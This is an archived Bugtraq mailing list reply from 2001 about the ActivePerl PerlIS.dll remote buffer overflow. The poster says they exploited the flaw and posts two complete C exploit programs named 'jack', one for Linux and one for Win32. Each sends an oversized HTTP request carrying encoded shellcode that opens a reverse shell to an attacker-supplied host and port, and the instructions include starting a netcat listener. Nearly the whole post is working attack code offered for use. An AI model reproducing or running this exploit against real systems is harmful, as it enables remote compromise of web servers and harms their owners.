Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability

From: Indigo <indig0 () talk21 com>
Date: 21 Nov 2001 01:38:45 -0000
Mailer: SecurityFocus
In-Reply-To: <20011116015506.17854.qmail () mail securityfocus com>


Received: (qmail 4025 invoked from network); 16 

Nov 2001 04:11:34 -0000

Received: from outgoing2.securityfocus.com 

(HELO outgoing.securityfocus.com) (66.38.151.26)

 by mail.securityfocus.com with SMTP; 16 Nov 

2001 04:11:34 -0000

Received: from lists.securityfocus.com 

(lists.securityfocus.com [66.38.151.19])

      by outgoing.securityfocus.com (Postfix) 

with QMQP

      id 78A568F460; Thu, 15 Nov 2001 

20:31:32 -0700 (MST)

Mailing-List: contact bugtraq-

help () securityfocus com; run by ezmlm

Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-

help () securityfocus com>

List-Unsubscribe: <mailto:bugtraq-

unsubscribe () securityfocus com>

List-Subscribe: <mailto:bugtraq-

subscribe () securityfocus com>

Delivered-To: mailing list 

bugtraq () securityfocus com

Delivered-To: moderator for 

bugtraq () securityfocus com

Received: (qmail 26744 invoked from network); 16 

Nov 2001 02:03:39 -0000

Date: 16 Nov 2001 01:55:06 -0000
Message-ID: 

<20011116015506.17854.qmail@mail.securityfocus.c
om>

Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Jim <raxor () dexlink com>
To: bugtraq () securityfocus com
Subject: Re: NSFOCUS SA2001-07 : ActivePerl 

PerlIS.dll Remote Buffer

   Overflow Vulnerability

Mailer: SecurityFocus
In-Reply-To: 

<20011115113830.45A9.SECURITY () nsfocus com>


Has anyone been able to duplicate this bug ? 

Am I wrong or does the ISAPI version of ActivePerl 
execute .plx files and not .pl as mentioned in the 
advisory ? 



Not only could I duplicate it, I exploited it. The exploit 
uses .pl as the extension.

Cheers,

Indigo.




Jack for Linux:


/*      jack.c - Active Perl ISAPI overflow exploit by 
Indigo <indig0 () talk21 com> 2001

        Usage: jack <victim host> <victim port> 
<attacker host> <attacker port>

        Before executing jack start up a netcat 
listener with the port set to 'attacker port'

        eg:     nc -l -p 'attacker port'

        You may need to hit return a few times to 
get the prompt up

        main shellcode adapted from jill.c by dark 
spyrit <dspyrit () beavuh org>

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
unsigned char shellcode[] =

"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69
\x6e\x2f"                       

"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"               
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"

"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15
\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95
\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96
\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14
\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66
\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6
\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1
\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96
\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97
\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95
\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41
\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95
\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1
\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5
\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95
\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5
\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95
\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95
\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2
\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2
\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10
\x3e\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11
\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2
\x91\x55\x3d\x97\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2
\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1
\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95
\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05
\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05
\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9
\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41
\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39
\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0
\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9
\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0
\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6
\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0
\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9
\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1
\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7
\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2
\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5
\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1
\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3
\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33
\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"

"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30
\x0D\x0A\x0D\x0A\x00";          

        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;

printf ("\njack - Active Perl ISAPI overflow 
launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");

        if (argc != 5)
        {
                printf ("Usage: %s <victim host> 
<victim port> <attacker host> <attacker port>\n", argv
[0]);
                exit (1);
        }
        
        if ((ht = gethostbyname(argv[1])) == 0){
                herror(argv[1]);
                exit(1);
        }
        
        sin.sin_port = htons(atoi(argv[2]));
        a_port = htons(atoi(argv[4]));
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);
        
        if ((ht = gethostbyname(argv[3])) == 0){
                herror(argv[3]);
                exit(1);
        }
        
        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        shellcode[745]= (a_port) & 0xff;
        shellcode[746]= (a_port >> 8) & 0xff;

        shellcode[750]= (a_host) & 0xff;
        shellcode[751]= (a_host >> 8) & 0xff;
        shellcode[752]= (a_host >> 16) & 0xff;
        shellcode[753]= (a_host >> 24) & 0xff;

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) 
== -1){
                perror("socket");
                exit(1);
        }
        
        printf("\nSending exploit....\n");

        if ((connect(s, (struct sockaddr *) &sin, sizeof
(sin))) == -1){
                perror("connect");
                exit(1);
        }
        
        write(s, shellcode, strlen(shellcode));
        sleep (1);
        close (s);
        
        printf ("Exploit sent.\n\n");

        exit(0);
}       


<CUT>



Jack for Win32:





/*      jack.c - Active Perl ISAPI overflow exploit by 
Indigo <indig0 () talk21 com> 2001

        Usage: jack <victim host> <victim port> 
<attacker host> <attacker port>

        Before executing jack start up a netcat 
listener with the port set to 'attacker port'

        eg:     nc -l -p 'attacker port'

        You may need to hit return a few times to 
get the prompt up

        main shellcode adapted from jill.c by dark 
spyrit <dspyrit () beavuh org>

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & 
Monkfish...Not forgetting D-Niderlunds
*/


#include <windows.h>
#include <stdio.h>
#include <winsock.h>


void main(int argc, char **argv)
{
        SOCKET s = 0;
        WSADATA wsaData;
        int x;
        unsigned short int      a_port;
    unsigned long           a_host;

unsigned char shellcode[] =

"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69
\x6e\x2f"                       //GET /cgi-bin/

"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"               //offset to return address
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"

"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15
\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95
\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96
\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14
\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66
\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6
\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1
\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96
\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97
\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95
\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41
\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95
\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1
\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5
\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95
\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5
\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95
\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95
\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2
\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2
\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10
\x3e\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11
\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2
\x91\x55\x3d\x97\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2
\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1
\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95
\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05
\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05
\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9
\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41
\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39
\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0
\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9
\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0
\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6
\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0
\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9
\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1
\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7
\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2
\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5
\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1
\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3
\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33
\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"

"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30
\x0D\x0A\x0D\x0A\x00";          //.pl HTTP/1.0
\n\n

        printf ("\njack - Active Perl ISAPI overflow 
launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");

        if (argc < 2)
        {
                printf ("Usage: %s <victim host> 
<victim port> <attacker host> <attacker port>\n", argv
[0]);
                exit (0);
        }

        a_port = htons(atoi(argv[4]));
    a_port^=0x9595;
    
    a_host = inet_addr(argv[3]);
    a_host^=0x95959595;

    shellcode[745]= (a_port) & 0xff;
    shellcode[746]= (a_port >> 8) & 0xff;

    shellcode[750]= (a_host) & 0xff;
    shellcode[751]= (a_host >> 8) & 0xff;
    shellcode[752]= (a_host >> 16) & 0xff;
    shellcode[753]= (a_host >> 24) & 0xff;

        WSAStartup (MAKEWORD(2,0),  
&wsaData);

        s = socket (AF_INET, SOCK_STREAM, 
IPPROTO_TCP);

        if (INVALID_SOCKET != s)
        {
                SOCKADDR_IN anAddr;
                anAddr.sin_family = AF_INET;
                anAddr.sin_port = htons (atoi(argv
[2]));
                anAddr.sin_addr.S_un.S_addr = 
inet_addr(argv[1]);

                if (connect(s, (struct sockaddr *)
&anAddr, sizeof (struct sockaddr)) == 0)
                {
                        printf ("Sending 
exploit....");

                        if ((x = send (s, 
shellcode, strlen(shellcode), 0)) == 0)
                        {
                                printf ("send: 
error sending first packet\n\n");
                                exit (0);
                        }

                        printf ("Exploit 
sent.\n\n");

                }
                closesocket(s);
        }
}
Previous By Date Next
Previous By Thread Next

Current thread: